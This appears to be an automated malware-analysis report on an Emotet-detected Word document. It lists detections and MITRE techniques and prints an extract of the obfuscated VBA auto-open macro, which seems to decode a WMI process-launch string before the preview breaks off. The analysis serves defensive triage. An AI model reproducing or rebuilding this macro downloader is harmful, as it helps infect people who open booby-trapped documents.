Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with a specific Emotet signature. Heuristics indicate the presence of VBA macros, specifically a Document_Open macro that utilizes GetObject, suggesting an attempt to execute malicious code. The VBA code itself is heavily obfuscated with meaningless variable names and loops, but the presence of the Document_open auto-execution and the GetObject call are strong indicators of malicious intent, likely to download and execute a secondary payload.
Heuristics (6)

- ClamAV: Doc.Downloader.Emotet-7473714-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7473714-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7575 bytes |

SHA-256: 08c944f3b4cd9e1d22d5483e817d198340b20aa35870bbb767208a62059a47fd
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Vxxjpuroivnlu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gytiudbjvyj, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dsxkvdqwvbxbw = 234 + 423
Do While Ietrcxlummv = 1
Dyahtlnx = 3 * Zytfqziujrm
Dggzsykx = ("Fred")
For Qtwbqilh = Pusirvvesl To Nywbnluyosy
Ltxrmyjv = ("Omnis.")
Jnyhwdgeps = 223
Next
Yepuzmrvw = Egbxmgmasgmnn
Loop
Ovmdxabvzp
Jppvdpsfkq = 234 + 423
Do While Atehjxzdj = 1
Tfzrxydfo = 3 * Fsvxasiu
Xbwmxqhboxa = ("Qui rerum aliquid.")
For Vpexvhglw = Nmmmwgvpctwec To Hweapczlzhwun
Cahzyldueicl = ("Ratione libero tenetur assumenda doloremque dicta est harum.")
Ylbsvzkhwdu = 223
Next
Nfzlhciq = Dgoebzsmrvyaw
Loop
End Sub
Attribute VB_Name = "Xwtsaryn"
Attribute VB_Base = "0{41A8A298-BA38-488F-9A2F-CA3C8BE5D474}{8E2F5AD2-4690-4C7A-BC26-6CDED876C27F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Uabiwvktv"
Function Xpdnzdpoiosa()
Hxmiztra = 234 + 423
Do While Hsewzhte = 1
Ujgujlod = 3 * Lxbhlcarnja
Dttcyxtqrfl = ("Asperiores ut aut aut.")
For Qsyoeozyqjrwl = Cqkdlsdbp To Giztsqxnmis
Mjrmjcfna = ("Nostrum earum fuga dolor.")
Auhxfnqjfoh = 223
Next
Wrbyxkykrfrcb = Ndcgwltxiaiz
Loop
Kinetedfx = Vxxjpuroivnlu.Gytiudbjvyj
Klgskatlinoel = 234 + 423
Do While Fnaepnkcgy = 1
Tjfvdofslxu = 3 * Onxtmhosz
Yeokzjztak = ("Amet.")
For Crlpfrah = Xaanjtrvxu To Wyzuscxaoxplu
Ribziqnh = ("Voluptas.")
Lagcfnfigv = 223
Next
Lyxjswzloth = Mvvlfjqljgcry
Loop
Ptjywpbprdtd = Kinetedfx + Xwtsaryn.Otgopzttwwsxm + Xwtsaryn.Xhaofdoue + Xwtsaryn.Huzdaljzgutn
Mpxxwbgr = 234 + 423
Do While Bsfoibqpfea = 1
Rmsjvsddajjt = 3 * Fwadvkvdl
Bsbxqict = ("Ut unde minima.")
For Leskzdjai = Svktfafhyoax To Abgjahzuaush
Hmcdzgjxrelhw = ("Corrupti deserunt sed et.")
Rkglqybdqhovx = 223
Next
Axiizmmwxzk = Cysknwjjlv
Loop
Hbjhcyhq = Ptjywpbprdtd + Xwtsaryn.Yumsgllsxk + Xwtsaryn.Ycqbeaauqeyp.Tag
Gknrkjewgug = 234 + 423
Do While Iolaztiezig = 1
Ghfnkyvvlka = 3 * Tnlyspksnt
Woykhbhev = ("Tempore.")
For Qtjiqsxdkgqav = Qqcwtnog To Xkditonrpu
Guzqqfzgn = ("Eaque sed quis et.")
Glqczjkbmvyt = 223
Next
Urscjfxvhjhw = Jgiwtswxclohf
Loop
Xpdnzdpoiosa = Xhhtcaavbd + Hbjhcyhq + Xhhtcaavbd
Kxgijdrldsqcz = 234 + 423
Do While Putfchevy = 1
Yiclpbmbhcg = 3 * Yknugkmdqltnm
Sgcisvejjrdoq = ("Alfred")
For Cicvhstkpndki = Ydsqjbzyzc To Ecdvwfqj
Qbdyvnuokv = ("Occaecati ipsam beatae inventore.")
Tawzoxcj = 223
Next
Nrphmshfsnxn = Mkfmdlrynejd
Loop
End Function
Function Ovmdxabvzp()
Mcbdenpu = 234 + 423
Do While Utxbcznbou = 1
Czurhxruwbq = 3 * Jzpqcfetpxxlu
Gemewvabi = ("Brendan")
For Rdumsdeet = Kmoaxmcwfmkmo To Lxbjxgdwoay
Uhqtehtaq = ("Recusandae dolorum non modi ullam quos ea iusto.")
Nzmhthrgudrgc = 223
Next
Shqzayjx = Wrhhyovbdvytw
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Kmrzuwhpy = 234 + 423
Do While Rnplsbun = 1
Jghbmqsx = 3 * Ivlbzpvuxrbd
Nemttltuxgafk = ("Quis et.")
For Goryqtvco = Fappzgrl To Dydpyoyfa
Xlrckfycr = ("Terrence")
Hqfsfhguozkad = 223
Next
Irfxwnryhoy = Asiwefqnjfi
Loop
Rpiaolvlcxto = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Vxxjpuroivn
... (truncated)